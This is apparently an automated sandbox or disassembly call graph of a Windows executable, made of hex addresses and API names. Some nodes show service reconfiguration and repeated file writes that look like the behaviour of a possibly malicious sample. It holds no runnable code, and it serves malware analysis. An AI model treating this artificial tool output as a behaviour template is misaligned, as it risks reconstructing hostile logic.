109599->109595 109601 4078b7 109600->109601 109602 40785a 109600->109602 109603 407d2c 59 API calls 109601->109603 109602->109601 109604 407865 109602->109604 109610 407888 _memmove 109603->109610 109605 407880 109604->109605 109606 43eb09 109604->109606 109622 407f27 109605->109622 109626 408029 109606->109626 109609 43eb13 109611 420db6 Mailbox 59 API calls 109609->109611 109610->109100 109612 43eb33 109611->109612 109614 407d43 _memmove 109613->109614 109615 407d3a 109613->109615 109614->109092 109615->109614 109616 407e4f 59 API calls 109615->109616 109616->109614 109618 407da6 109617->109618 109619 407d99 109617->109619 109620 420db6 Mailbox 59 API calls 109618->109620 109619->109093 109620->109619 109621->109121 109623 407f3f 109622->109623 109625 407f39 109622->109625 109624 420db6 Mailbox 59 API calls 109623->109624 109624->109625 109625->109610 109627 420db6 Mailbox 59 API calls 109626->109627 109628 408033 109627->109628 109628->109609 109630 407a85 _memmove 109629->109630 109631 407a5f 109629->109631 109630->109134 109631->109630 109632 420db6 Mailbox 59 API calls 109631->109632 109633 407ad4 109632->109633 109634 420db6 Mailbox 59 API calls 109633->109634 109634->109630 109635->109135 110004->109248 110006 407c5f __wsetenvp 110005->110006 110007 408029 59 API calls 110006->110007 110008 407c70 _memmove 110006->110008 110009 43ed07 _memmove 110007->110009 110008->109256 110011 463c3e 110010->110011 110012 464475 FindFirstFileW 110010->110012 110011->108766 110012->110011 110013 46448a FindClose 110012->110013 110013->110011 110040 407a16 110014->110040 110016 40646a 110047 40750f 110016->110047 110018 406484 Mailbox 110018->109003 110021 43dff6 110057 45f8aa 91 API calls 4 library calls 110021->110057 110022 40750f 59 API calls 110035 406265 110022->110035 110026 407d8c 59 API calls 110026->110035 110027 43e004 110028 40750f 59 API calls 110027->110028 110029 43e01a 110028->110029 110029->110018 110030 406799 _memmove 110058 45f8aa 91 API calls 4 library calls 110030->110058 110031 43df92 110032 408029 59 API calls 110031->110032 110034 43df9d 110032->110034 110038 420db6 Mailbox 59 API calls 110034->110038 110035->110016 110035->110021 110035->110022 110035->110026 110035->110030 110035->110031 110036 407e4f 59 API calls 110035->110036 110045 405f6c 60 API calls 110035->110045 110046 405d41 59 API calls Mailbox 110035->110046 110055 405e72 60 API calls 110035->110055 110056 407924 59 API calls 2 library calls 110035->110056 110037 40643b CharUpperBuffW 110036->110037 110037->110035 110038->110030 110039->109007 110041 420db6 Mailbox 59 API calls 110040->110041 110042 407a3b 110041->110042 110043 408029 59 API calls 110042->110043 110044 407a4a 110043->110044 110044->110035 110045->110035 110046->110035 110048 4075af 110047->110048 110053 407522 _memmove 110047->110053 110050 420db6 Mailbox 59 API calls 110048->110050 110049 420db6 Mailbox 59 API calls 110051 407529 110049->110051 110050->110053 110052 420db6 Mailbox 59 API calls 110051->110052 110054 407552 110051->110054 110052->110054 110053->110049 110054->110018 110055->110035 110056->110035 110057->110027 110058->110018 110059->109043 110060->109015 110061->109029 110062->109027 110063->109031 110064->109041 110065->109044 110066->109048 110067->108787 110068->108785 110069->108676 110070->108676 110071->108669 110072->108675 110073->108662 110074->108675 110075->108698 110076->108704 110077 a77b23 110078 a77b2b 110077->110078 110079 a75f10 110077->110079 110080 a76084 SetFilePointerEx 110079->110080 110081 a75d90 110079->110081 110080->110079 110082 401066 110087 40f76f 110082->110087 110084 40106c 110085 422d40 __cinit 67 API calls 110084->110085 110086 401076 110085->110086 110088 40f790 110087->110088 110120 41ff03 110088->110120 110092 40f7d7 110093 407667 59 API calls 110092->110093 110094 40f7e1 110093->110094 110095 407667 59 API calls 110094->110095 110096 40f7eb 110095->110096 110097 407667 59 API calls 110096->110097 110098 40f7f5 110097->110098 110099 407667 59 API calls 110098->110099 110100 40f833 110099->110100 110101 407667 59 API calls 110100->110101 110102 40f8fe 110101->110102 110130 415f87 110102->110130 110106 40f930 110107 407667 59 API calls 110106->110107 110108 40f93a 110107->110108 110158 41fd9e 110108->110158 110110 40f981 110111 40f991 GetStdHandle 110110->110111 110112 40f9dd 110111->110112 110113 4445ab 110111->110113 110114 40f9e5 OleInitialize 110112->110114 110113->110112 110115 4445b4 110113->110115 110114->110084 110165 466b38 64 API calls Mailbox 110115->110165 110117 4445bb 110166 467207 CreateThread 110117->110166 110119 4445c7 CloseHandle 110119->110114 110167 41ffdc 110120->110167 110123 41ffdc 59 API calls 110124 41ff45 110123->110124 110125 407667 59 API calls 110124->110125 110126 41ff51 110125->110126 110127 407bcc 59 API calls 110126->110127 110128 40f796 110127->110128 110129 420162 6 API calls 110128->110129 110129->110092 110131 407667 59 API calls 110130->110131 110132 415f97 110131->110132 110133 407667 59 API calls 110132->110133 110134 415f9f 110133->110134 110174 415a9d 110134->110174 110137 415a9d 59 API calls 110138 415faf 110137->110138 110139 407667 59 API calls 110138->110139 110140 415fba 110139->110140 110141 420db6 Mailbox 59 API calls 110140->110141 110142 40f908 110141->110142 110143 4160f9 110142->110143 110144 416107 110143->110144 110145 407667 59 API calls 110144->110145 110146 416112 110145->110146 110147 407667 59 API calls 110146->110147 110148 41611d 110147->110148 110149 407667 59 API calls 110148->110149 110150 416128 110149->110150 110151 407667 59 API calls 110150->110151 110152 416133 110151->110152 110153 415a9d 59 API calls 110152->110153 110154 41613e 110153->110154 110155 420db6 Mailbox 59 API calls 110154->110155 110156 416145 RegisterWindowMessageW 110155->110156 110156->110106 110159 45576f 110158->110159 110160 41fdae 110158->110160 110177 469ae7 60 API calls 110159->110177 110161 420db6 Mailbox 59 API calls 110160->110161 110164 41fdb6 110161->110164 110163 45577a 110164->110110 110165->110117 110166->110119 110178 4671ed 65 API calls 110166->110178 110168 407667 59 API calls 110167->110168 110169 41ffe7 110168->110169 110170 407667 59 API calls 110169->110170 110171 41ffef 110170->110171 110172 407667 59 API calls 110171->110172 110173 41ff3b 110172->110173 110173->110123 110175 407667 59 API calls 110174->110175 110176 415aa5 110175->110176 110176->110137 110177->110163 110179 a7b180 110187 a7b0de 110179->110187 110180 a7b2a7 SetFilePointerEx 110182 a7b1df 110180->110182 110186 a7b1c6 110180->110186 110181 a7b196 110183 a7b3a6 110181->110183 110181->110186 110184 a7b3b2 110183->110184 110185 a7b328 SetFilePointerEx 110183->110185 110186->110182 110188 a7b2e0 WriteFile 110186->110188 110187->110179 110187->110180 110187->110181 110187->110185 110189 a7b253 110187->110189 110190 a7b0d0 SetFilePointerEx 110187->110190 110190->110187 110191 a7b054 110190->110191 110192 a7520c 110195 a9cbd0 110192->110195 110194 a75211 110196 a9be50 _wcslen 110195->110196 110196->110194 110196->110195 110197 a9c168 110196->110197 110200 a9bfe9 110196->110200 110201 a9c78e CloseServiceHandle 110196->110201 110202 a9bffd StrStrIW 110196->110202 110203 a9c706 StrStrIW 110196->110203 110205 a9bf68 StrStrIW 110196->110205 110206 a9c72b StrStrIW 110196->110206 110207 a9c399 StrStrIW 110196->110207 110208 a9bf7e 110196->110208 110210 a9c0fd CloseServiceHandle 110196->110210 110211 a9c7e4 StartServiceW 110196->110211 110213 a9c36b OpenServiceW 110196->110213 110214 a9c65a ChangeServiceConfigW 110196->110214 110215 a7ce90 110196->110215 110233 a9a350 CloseServiceHandle 110196->110233 110235 a75d20 110196->110235 110234 a9a905 LocalFree 110197->110234 110200->110194 110201->110196 110202->110196 110203->110196 110205->110196 110206->110196 110207->110196 110212 a9c3a9 110207->110212 110208->110211 110210->110196 110211->110196 110212->110194 110213->110196 110214->110196 110214->110200 110224 a7cc9b _wcslen 110215->110224 110216 a7d729 GetFileSizeEx 110219 a7d8a1 CloseHandle 110216->110219 110216->110224 110217 a7d426 110217->110219 110220 a7d42a CloseHandle 110217->110220 110218 a7d5c5 CreateFileW 110218->110224 110219->110224 110220->110224 110221 a7cd5c lstrcmpiW 110221->110224 110223 a7cca0 lstrcmpiW 110223->110224 110224->110196 110224->110215 110224->110216 110224->110217 110224->110218 110224->110219 110224->110220 110224->110221 110224->110223 110225 a7d049 SetFilePointerEx 110224->110225 110227 a75d20 VirtualAlloc VirtualFree 110224->110227 110228 a7d378 CloseHandle 110224->110228 110230 a7cfbb GetFileTime 110224->110230 110231 a7d903 110224->110231 110232 a7cc92 110224->110232 110240 a78937 VirtualAlloc VirtualFree 110224->110240 110241 a78470 VirtualAlloc VirtualFree 110224->110241 110225->110224 110227->110224 110228->110224 110229 aafdfc 40 API calls 110229->110231 110230->110224 110231->110229 110231->110232 110232->110196 110233->110196 110234->110200 110237 a75d22 110235->110237 110236 a75d39 VirtualAlloc 110236->110237 110237->110196 110237->110236 110239 a75d46 VirtualFree 110237->110239 110239->110196 110240->110224 110242 44416f 110246 455fe6 110242->110246 110244 44417a 110245 455fe6 85 API calls 110244->110245 110245->110244 110247 456020 110246->110247 110252 455ff3 110246->110252 110247->110244 110248 456022 110258 409328 84 API calls Mailbox 110248->110258 110250 456027 110251 409837 84 API calls 110250->110251 110253 45602e 110251->110253 110252->110247 110252->110248 110252->110250 110255 45601a 110252->110255 110254 407b2e 59 API calls 110253->110254 110254->110247 110257 4095a0 59 API calls _wcsstr 110255->110257 110257->110247 110258->110250 110259 40e5ab 110262 40d100 110259->110262 110261 40e5b9 110263 40d37d 110262->110263 110264 40d11d 110262->110264 110276 40d54b 110263->110276 110311 469e4a 89 API calls 4 library calls 110263->110311 110265 4426e0 110264->110265 110266 442691 110264->110266 110283 40d144 110264->110283 110306 47a3e6 331 API calls __cinit 110265->110306 110269 442694 110266->110269 110274 4426af 110266->110274 110270 4426a0 110269->110270 110269->110283 110304 47a9fa 331 API calls 110270->110304 110271 422d40 __cinit 67 API calls 110271->110283 110274->110263 110305 47aea2 331 API calls 3 library calls 110274->110305 110275 4428b5 110275->110275 110276->110261 110278 40d434 110298 408a52 68 API calls 110278->110298 110281 40d443 110281->110261 110282 4427fc 110310 47a751 89 API calls 110282->110310 110283->110263 110283->110271 110283->110276 110283->110278 110283->110282 110286 4084c0 69 API calls 110283->110286 110293 409ea0 331 API calls 110283->110293 110294 408047 59 API calls 110283->110294 110296 408740 68 API calls __cinit 110283->110296 110297 408542 68 API calls 110283->110297 110299 40843a 68 API calls 110283->110299 110300 40cf7c 331 API calls 110283->110300 110301 409dda 59 API calls Mailbox 110283->110301 110302 40cf00 89 API calls 110283->110302 110303 40cd7d 331 API calls 110283->110303 110307 408a52 68 API calls 110283->110307 110308 409d3c 60 API calls Mailbox 110283->110308 110309 45678d 60 API calls 110283->110309 110286->110283 110293->110283 110294->110283 110296->110283 110297->110283 110298->110281 110299->110283 110300->110283 110301->110283 110302->110283 110303->110283 110304->110276 110305->110263 110306->110283 110307->110283 110308->110283 110309->110283 110310->110263 110311->110275 110312 403633 110313 40366a 110312->110313 110314 4036e7 110313->110314 110315 403688 110313->110315 110351 4036e5 110313->110351 110319 4036ed 110314->110319 110320 43d0cc 110314->110320 110316 403695 110315->110316 110317 40374b PostQuitMessage 110315->110317 110322 4036a0 110316->110322 110323 43d154 110316->110323 110353 4036d8 110317->110353 110318 4036ca DefWindowProcW 110318->110353 110324 4036f2 110319->110324 110325 403715 SetTimer RegisterWindowMessageW 110319->110325 110361 411070 10 API calls Mailbox 110320->110361 110329 403755 110322->110329 110330 4036a8 110322->110330 110377 462527 71 API calls _memset 110323->110377 110326 4036f9 KillTimer 110324->110326 110327 43d06f 110324->110327 110331 40373e CreatePopupMenu 110325->110331 110325->110353 110357 40443a Shell_NotifyIconW _memset 110326->110357 110339 43d074 110327->110339 110340 43d0a8 MoveWindow 110327->110340 110328 43d0f3 110362 411093 331 API calls Mailbox 110328->110362 110359 4044a0 64 API calls _memset 110329->110359 110335 4036b3 110330->110335 110336 43d139 110330->110336 110331->110353 110342 43d124 110335->110342 110348 4036be 110335->110348 110336->110318 110376 457c36 59 API calls Mailbox 110336->110376 110337 43d166 110337->110318 110337->110353 110343 43d097 SetFocus 110339->110343 110344 43d078 110339->110344 110340->110353 110341 40370c 110358 403114 DeleteObject DestroyWindow Mailbox 110341->110358 110375 462d36 81 API calls _memset 110342->110375 110343->110353 110344->110348 110349 43d081 110344->110349 110348->110318 110363 40443a Shell_NotifyIconW _memset 110348->110363 110360 411070 10 API calls Mailbox 110349->110360 110350 403764 110350->110353 110351->110318 110355 43d118 110364 40434a 110355->110364 110357->110341 110358->110353 110359->110350 110360->110353 110361->110328 110362->110348 110363->110355 110365 404375 _memset 110364->110365 110378 404182 110365->110378 110368 4043fa 110370 404430 Shell_NotifyIconW 110368->110370 110371 404414 Shell_NotifyIconW 110368->110371 110372 404422 110370->110372 110371->110372 110382 40407c 110372->110382 110374 404429 110374->110351 110375->110350 110376->110351 110377->110337 110379 43d423 110378->110379 110380 404196 110378->110380 110379->110380 110381 43d42c DestroyIcon 110379->110381 110380->110368 110404 462f94 62 API calls _W_store_winword 110380->110404 110381->110380 110383 404098 110382->110383 110403 40416f Mailbox 110382->110403 110384 407a16 59 API calls 110383->110384 110385 4040a6 110384->110385 110386 4040b3 110385->110386 110387 43d3c8 LoadStringW 110385->110387 110388 407bcc 59 API calls 110386->110388 110389 43d3e2 110387->110389 110390 4040c8 110388->110390 110391 407b2e 59 API calls 110389->110391 110390->110389 110392 4040d9 110390->110392 110397 43d3ec 110391->110397 110393 4040e3 110392->110393 110394 404174 110392->110394 110395 407b2e 59 API calls 110393->110395 110396 408047 59 API calls 110394->110396 110398 4040ed _memset _wcscpy 110395->110398 110396->110398 110397->110398 110399 407cab 59 API calls 110397->110399 110401 404155 Shell_NotifyIconW 110398->110401 110400 43d40e 110399->110400 110402 407cab 59 API calls 110400->110402 110401->110403 110402->110398 110403->110374 110404->110368 110405 427c56 110406 427c62 110405->110406 110442 429e08 GetStartupInfoW 110406->110442 110409 427cbf 110411 427cca 110409->110411 110527 427da6 58 API calls 3 library calls 110409->110527 110410 427c67 110444 428b7c GetProcessHeap 110410->110444 110445 429ae6 110411->110445 110414 427cd0 110416 427cdb __RTC_Initialize 110414->110416 110528 427da6 58 API calls 3 library calls 110414->110528 110466 42d5d2 110416->110466 110418 427cea 110419 427cf6 GetCommandLineW 110418->110419 110529 427da6 58 API calls 3 library calls 110418->110529 110485 434f23 GetEnvironmentStringsW 110419->110485 110422 427cf5 110422->110419 110425 427d10 110426 427d1b 110425->110426 110530 4230b5 58 API calls 3 library calls 110425->110530 110495 434d58 110426->110495 110429 427d21 110430 427d2c 110429->110430 110531 4230b5 58 API calls 3 library calls 110429->110531 110509 4230ef 110430->110509 110433 427d34 110434 427d3f __wwincmdln 110433->110434 110532 4230b5 58 API calls 3 library calls 110433->110532 110515 4047d0 110434->110515 110437 427d53 110438 427d62 110437->110438 110533 423358 58 API calls _doexit 110437->110533 110534 4230e0 58 API calls _doexit 110438->110534 110441 427d67 __setmode 110443 429e1e 110442->110443 110443->110410 110444->110409 110535 423187 36 API calls 2 library calls 110445->110535 110447 429aeb 110536 429d3c InitializeCriticalSectionAndSpinCount __mtinitlocknum 110447->110536 110449 429af0 110450 429af4 110449->110450 110538 429d8a TlsAlloc 110449->110538 110537 429b5c 61 API calls 2 library calls 110450->110537 110453 429af9 110453->110414 110454 429b06 110454->110450 110455 429b11 110454->110455 110539 4287d5 110455->110539 110458 429b53 110547 429b5c 61 API calls 2 library calls 110458->110547 110461 429b32 110461->110458 110463 429b38 110461->110463 110462 429b58 110462->110414 110546 429a33 58 API calls 4 library calls 110463->110546 110465 429b40 GetCurrentThreadId 110465->110414 110467 42d5de __setmode 110466->110467 110468 429c0b __lock 58 API calls 110467->110468 110469 42d5e5 110468->110469 110470 4287d5 __calloc_crt 58 API calls 110469->110470 110471 42d5f6 110470->110471 110472 42d661 GetStartupInfoW 110471->110472 110473 42d601 @_EH4_CallFilterFunc@8 __setmode 110471->110473 110479 42d676 110472->110479 110480 42d7a5 110472->110480 110473->110418 110474 42d86d 110561 42d87d LeaveCriticalSection _doexit 110474->110561 110476 4287d5 __calloc_crt 58 API calls 110476->110479 110477 42d7f2 GetStdHandle 110477->110480 110478 42d805 GetFileType 110478->110480 110479->110476 110479->110480 110481 42d6c4 110479->110481 110480->110474 110480->110477 110480->110478 110560 429e2b InitializeCriticalSectionAndSpinCount 110480->110560 110481->110480 110482 42d6f8 GetFileType 110481->110482 110559 429e2b InitializeCriticalSectionAndSpinCount 110481->110559 110482->110481 110486 434f34 110485->110486 110487 427d06 110485->110487 110562 42881d 58 API calls 2 library calls 110486->110562 110491 434b1b GetModuleFileNameW 110487->110491 110489 434f5a _memmove 110490 434f70 FreeEnvironmentStringsW 110489->110490 110490->110487 110492 434b4f _wparse_cmdline 110491->110492 110494 434b8f _wparse_cmdline 110492->110494 110563 42881d 58 API calls 2 library calls 110492->110563 110494->110425 110496 434d71 __wsetenvp 110495->110496 110500 434d69 110495->110500 110497 4287d5 __calloc_crt 58 API calls 110496->110497 110505 434d9a __wsetenvp 110497->110505 110498 434df1 110499 422d55 _free 58 API calls 110498->110499 110499->110500 110500->110429 110501 4287d5 __calloc_crt 58 API calls 110501->110505 110502 434e16 110503 422d55 _free 58 API calls 110502->110503 110503->110500 110505->110498 110505->110500 110505->110501 110505->110502 110506 434e2d 110505->110506 110564 434607 58 API calls __setmode 110505->110564 110565 428dc6 IsProcessorFeaturePresent 110506->110565 110508 434e39 110508->110429 110510 4230fb __IsNonwritableInCurrentImage 110509->110510 110580 42a4d1 110510->110580 110512 423119 __initterm_e 110513 422d40 __cinit 67 API calls 110512->110513 110514 423138 __cinit __IsNonwritableInCurrentImage 110512->110514 110513->110514 110514->110433 110516 4047ea 110515->110516 110526 404889 110515->110526 110517 404824 IsThemeActive 110516->110517 110583 42336c 110517->110583 110521 404850 110595 4048fd SystemParametersInfoW SystemParametersInfoW 110521->110595 110523 40485c 110596 403b3a 110523->110596 110525 404864 SystemParametersInfoW 110525->110526 110526->110437 110527->110411 110528->110416 110529->110422 110533->110438 110534->110441 110535->110447 110536->110449 110537->110453 110538->110454 110541 4287dc 110539->110541 110542 428817 110541->110542 110544 4287fa 110541->110544 110548 4351f6 110541->110548 110542->110458 110545 429de6 TlsSetValue 110542->110545 110544->110541 110544->110542 110556 42a132 Sleep 110544->110556 110545->110461 110546->110465 110547->110462 110549 435201 110548->110549 110550 43521c 110548->110550 110549->110550 110551 43520d 110549->110551 110553 43522c HeapAlloc 110550->110553 110554 435212 110550->110554 110558 4233a1 DecodePointer 110550->110558 110557 428b28 58 API calls __getptd_noexit 110551->110557 110553->110550 110553->110554 110554->110541 110556->110544 110557->110554 110558->110550 110559->110481 110560->110480 110561->110473 110562->110489 110563->110494 110564->110505 110566 428dd1 110565->110566 110571 428c59 110566->110571 110570 428dec 110570->110508 110572 428c73 _memset ___raise_securityfailure 110571->110572 110573 428c93 IsDebuggerPresent 110572->110573 110579 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 110573->110579 110575 428d57 ___raise_securityfailure 110576 42c5f6 __cftog_l 6 API calls 110575->110576 110577 428d7a 110576->110577 110578 42a140 GetCurrentProcess TerminateProcess 110577->110578 110578->110570 110579->110575 110581 42a4d4 EncodePointer 110580->110581 110581->110581 110582 42a4ee 110581->110582 110582->110512 110584 429c0b __lock 58 API calls 110583->110584 110585 423377 DecodePointer EncodePointer 110584->110585 110648 429d75 LeaveCriticalSection 110585->110648 110587 404849 110588 4233d4 110587->110588 110589 4233f8 110588->110589 110590 4233de 110588->110590 110589->110521 110590->110589 110649 428b28 58 API calls __getptd_noexit 110590->110649 110592 4233e8 110650 428db6 9 API calls __setmode 110592->110650 110594 4233f3 110594->110521 110595->110523 110597 403b47 __ftell_nolock 110596->110597 110598 407667 59 API calls 110597->110598 110599 403b51 GetCurrentDirectoryW 110598->110599 110651 403766 110599->110651 110601 403b7a IsDebuggerPresent 110602 43d272 MessageBoxA 110601->110602 110603 403b88 110601->110603 110604 43d28c 110602->110604 110603->110604 110605 403ba5 110603->110605 110635 403c61 110603->110635 110773 407213 59 API calls Mailbox 110604->110773 110732 407285 110605->110732 110606 403c68 SetCurrentDirectoryW 110609 403c75 Mailbox 110606->110609 110609->110525 110610 43d29c 110615 43d2b2 SetCurrentDirectoryW 110610->110615 110615->110609 110635->110606 110648->110587 110649->110592 110650->110594 110652 407667 59 API calls 110651->110652 110653 40377c 110652->110653 110782 403d31 110653->110782 110655 40379a 110656 404706 61 API calls 110655->110656 110657 4037ae 110656->110657 110658 407de1 59 API calls 110657->110658 110659 4037bb 110658->110659 110660 404ddd 136 API calls 110659->110660 110661 4037d4 110660->110661 110662 43d173 110661->110662 110663 4037dc Mailbox 110661->110663 110835 46955b 110662->110835 110666 408047 59 API calls 110663->110666 110669 4037ef 110666->110669 110667 43d192 110668 422d55 _free 58 API calls 110667->110668 110671 43d19f 110668->110671 110796 40928a 110669->110796 110670 404e4a 84 API calls 110670->110667 110673 404e4a 84 API calls 110671->110673 110675 43d1a8 110673->110675 110679 403ed0 59 API calls 110675->110679 110676 407de1 59 API calls 110677 403808 110676->110677 110678 4084c0 69 API calls 110677->110678 110680 40381a Mailbox 110678->110680 110681 43d1c3 110679->110681 110682 407de1 59 API calls 110680->110682 110683 403ed0 59 API calls 110681->110683 110684 403840 110682->110684 110685 43d1df 110683->110685 110686 4084c0 69 API calls 110684->110686 110687 404706 61 API calls 110685->110687 110690 40384f Mailbox 110686->110690 110688 43d204 110687->110688 110689 403ed0 59 API calls 110688->110689 110691 43d210 110689->110691 110692 407667 59 API calls 110690->110692 110693 408047 59 API calls 110691->110693 110694 40386d 110692->110694 110695 43d21e 110693->110695 110799 403ed0 110694->110799 110697 403ed0 59 API calls 110695->110697 110699 43d22d 110697->110699 110705 408047 59 API calls 110699->110705 110701 403887 110701->110675 110702 403891 110701->110702 110703 422efd _W_store_winword 60 API calls 110702->110703 110704 40389c 110703->110704 110704->110681 110706 4038a6 110704->110706 110707 43d24f 110705->110707 110708 422efd _W_store_winword 60 API calls 110706->110708 110709 403ed0 59 API calls 110707->110709 110710 4038b1 110708->110710 110712 43d25c 110709->110712 110710->110685 110711 4038bb 110710->110711 110713 422efd _W_store_winword 60 API calls 110711->110713 110712->110712 110714 4038c6 110713->110714 110714->110699 110715 403907 110714->110715 110717 403ed0 59 API calls 110714->110717 110715->110699 110716 403914 110715->110716 110815 4092ce 110716->110815 110718 4038ea 110717->110718 110720 408047 59 API calls 110718->110720 110722 4038f8 110720->110722 110725 403ed0 59 API calls 110722->110725 110725->110715 110727 40394f 110728 40928a 59 API calls 110727->110728 110729 403995 Mailbox 110727->110729 110730 408ee0 60 API calls 110727->110730 110731 403ed0 59 API calls 110727->110731 110728->110727 110729->110601 110730->110727 110731->110727 110733 407292 __ftell_nolock 110732->110733 110734 43ea22 _memset 110733->110734 110735 4072ab 110733->110735 110737 43ea3e GetOpenFileNameW 110734->110737 110891 404750 110735->110891 110739 43ea8d 110737->110739 110742 407bcc 59 API calls 110739->110742 110744 43eaa2 110742->110744 110744->110744 110773->110610 110783 403d3e __ftell_nolock 110782->110783 110784 407bcc 59 API calls 110783->110784 110789 403ea4 Mailbox 110783->110789 110786 403d70 110784->110786 110785 4079f2 59 API calls 110785->110786 110786->110785 110792 403da6 Mailbox 110786->110792 110787 403e77 110788 407de1 59 API calls 110787->110788 110787->110789 110791 403e98 110788->110791 110789->110655 110790 407de1 59 API calls 110790->110792 110793 403f74 59 API calls 110791->110793 110792->110787 110792->110789 110792->110790 110795 4079f2 59 API calls 110792->110795 110870 403f74 110792->110870 110793->110789 110795->110792 110797 420db6 Mailbox 59 API calls 110796->110797 110798 4037fb 110797->110798 110798->110676 110800 403ef3 110799->110800 110801 403eda 110799->110801 110803 407bcc 59 API calls 110800->110803 110802 408047 59 API calls 110801->110802 110804 403879 110802->110804 110803->110804 110805 422efd 110804->110805 110806 422f09 110805->110806 110807 422f7e 110805->110807 110814 422f2e 110806->110814 110876 428b28 58 API calls __getptd_noexit 110806->110876 110878 422f90 60 API calls 3 library calls 110807->110878 110809 422f8b 110809->110701 110811 422f15 110877 428db6 9 API calls __setmode 110811->110877 110813 422f20 110813->110701 110814->110701 110816 4092d6 110815->110816 110817 420db6 Mailbox 59 API calls 110816->110817 110818 4092e4 110817->110818 110819 403924 110818->110819 110879 4091fc 59 API calls Mailbox 110818->110879 110821 409050 110819->110821 110880 409160 110821->110880 110823 40905f 110824 420db6 Mailbox 59 API calls 110823->110824 110825 403932 110823->110825 110824->110825 110826 408ee0 110825->110826 110827 43f17c 110826->110827 110833 408ef7 110826->110833 110827->110833 110890 408bdb 59 API calls Mailbox 110827->110890 110829 408fff 110829->110727 110830 409040 110889 409d3c 60 API calls Mailbox 110830->110889 110831 408ff8 110834 420db6 Mailbox 59 API calls 110831->110834 110833->110829 110833->110830 110833->110831 110834->110829 110836 404ee5 85 API calls 110835->110836 110837 4695ca 110836->110837 110838 469734 96 API calls 110837->110838 110839 4695dc 110838->110839 110840 404f0b 74 API calls 110839->110840 110868 43d186 110839->110868 110841 4695f7 110840->110841 110842 404f0b 74 API calls 110841->110842 110843 469607 110842->110843 110844 404f0b 74 API calls 110843->110844 110845 469622 110844->110845 110846 404f0b 74 API calls 110845->110846 110847 46963d 110846->110847 110848 404ee5 85 API calls 110847->110848 110849 469654 110848->110849 110850 42571c __crtLCMapStringA_stat 58 API calls 110849->110850 110851 46965b 110850->110851 110852 42571c __crtLCMapStringA_stat 58 API calls 110851->110852 110853 469665 110852->110853 110854 404f0b 74 API calls 110853->110854 110855 469679 110854->110855 110856 469109 GetSystemTimeAsFileTime 110855->110856 110857 46968c 110856->110857 110858 4696b6 110857->110858 110859 4696a1 110857->110859 110861 4696bc 110858->110861 110862 46971b 110858->110862 110860 422d55 _free 58 API calls 110859->110860 110863 4696a7 110860->110863 110864 468b06 116 API calls 110861->110864 110865 422d55 _free 58 API calls 110862->110865 110866 422d55 _free 58 API calls 110863->110866 110867 469713 110864->110867 110865->110868 110866->110868 110869 422d55 _free 58 API calls 110867->110869 110868->110667 110868->110670 110869->110868 110871 403f82 110870->110871 110875 403fa4 _memmove 110870->110875 110873 420db6 Mailbox 59 API calls 110871->110873 110872 420db6 Mailbox 59 API calls 110874 403fb8 110872->110874 110873->110875 110874->110792 110875->110872 110876->110811 110877->110813 110878->110809 110879->110819 110881 409169 Mailbox 110880->110881 110882 43f19f 110881->110882 110887 409173 110881->110887 110883 420db6 Mailbox 59 API calls 110882->110883 110885 43f1ab 110883->110885 110884 40917a 110884->110823 110887->110884 110888 409c90 59 API calls Mailbox 110887->110888 110888->110887 110889->110829 110890->110833 110953 431940 110891->110953 110894 404799 110897 407d8c 59 API calls 110894->110897 110895 40477c 110896 407bcc 59 API calls 110895->110896 110898 404788 110896->110898 110897->110898 110955 407726 110898->110955 110901 420791 110902 431940 __ftell_nolock 110901->110902 110903 42079e GetLongPathNameW 110902->110903 110904 407bcc 59 API calls 110903->110904 110905 4072bd 110904->110905 110906 40700b 110905->110906 110907 407667 59 API calls 110906->110907 110908 40701d 110907->110908 110954 40475d GetFullPathNameW 110953->110954 110954->110894 110954->110895 110956 407734 110955->110956 110957 407d2c 59 API calls 110956->110957 110958 404794 110957->110958 110958->110901 111118 401055 111123 402649 111118->111123 111121 422d40 __cinit 67 API calls 111122 401064 111121->111122 111124 407667 59 API calls 111123->111124 111125 4026b7 111124->111125 111130 403582 111125->111130 111128 402754 111129 40105a 111128->111129 111133 403416 59 API calls 2 library calls 111128->111133 111129->111121 111134 4035b0 111130->111134 111133->111128 111135 4035bd 111134->111135 111136 4035a1 111134->111136 111135->111136 111137 4035c4 RegOpenKeyExW 111135->111137 111136->111128 111137->111136 111138 4035de RegQueryValueExW 111137->111138 111139 403614 RegCloseKey 111138->111139 111140 4035ff 111138->111140 111139->111136 111140->111139 111141 401016 111146 404974 111141->111146 111144 422d40 __cinit 67 API calls 111145 401025 111144->111145 111147 420db6 Mailbox 59 API calls 111146->111147 111148 40497c 111147->111148 111150 40101b 111148->111150 111153 404936 111148->111153 111150->111144 111154 404951 111153->111154 111155 40493f 111153->111155 111157 4049a0 111154->111157 111156 422d40 __cinit 67 API calls 111155->111156 111156->111154 111158 407667 59 API calls 111157->111158 111159 4049b8 GetVersionExW 111158->111159 111160 407bcc 59 API calls 111159->111160 111161 4049fb 111160->111161 111162 407d2c 59 API calls 111161->111162 111165 404a28 111161->111165 111163 404a1c 111162->111163 111164 407726 59 API calls 111163->111164 111164->111165 111166 43d864 111165->111166 111167 404a93 GetCurrentProcess IsWow64Process 111165->111167 111168 404aac 111167->111168 111169 404ac2 111168->111169 111170 404b2b GetSystemInfo 111168->111170 111181 404b37 111169->111181 111172 404af8 111170->111172 111172->111150 111174 404ad4 111176 404b37 2 API calls 111174->111176 111175 404b1f GetSystemInfo 111177 404ae9 111175->111177 111178 404adc GetNativeSystemInfo 111176->111178 111177->111172 111179 404aef FreeLibrary 111177->111179 111178->111177 111179->111172 111182 404ad0 111181->111182 111183 404b40 LoadLibraryA 111181->111183 111182->111174 111182->111175 111183->111182 111184 404b51 GetProcAddress 111183->111184 111184->111182 111185 a7aaf0 111186 a7ab06 111185->111186 111190 a7ab57 111186->111190 111191 a76490 111186->111191 111193 a75f10 111191->111193 111194 a75d90 111191->111194 111192 a76084 SetFilePointerEx 111192->111193 111193->111192 111193->111194 111195 aafaf0 111194->111195 111196 aafafd 111195->111196 111198 aafb84 111195->111198 111197 aafb2a 111196->111197 111196->111198 111201 ab032f 111197->111201 111214 ab1a1b 21 API calls 2 library calls 111197->111214 111202 aafc05 111198->111202 111206 aafbda 111198->111206 111200 ab08d6 111200->111190 111201->111190 111205 aafc38 111202->111205 111213 ab0fe0 21 API calls __startOneArgErrorHandling 111202->111213 111204 aafc22 111204->111190 111205->111190 111206->111205 111207 ab116e 111206->111207 111208 ab1167 111206->111208 111216 ab0fe0 21 API calls __startOneArgErrorHandling 111207->111216 111215 ab0ff7 21 API calls __startOneArgErrorHandling 111208->111215 111211 ab116c 111211->111190 111212 ab1173 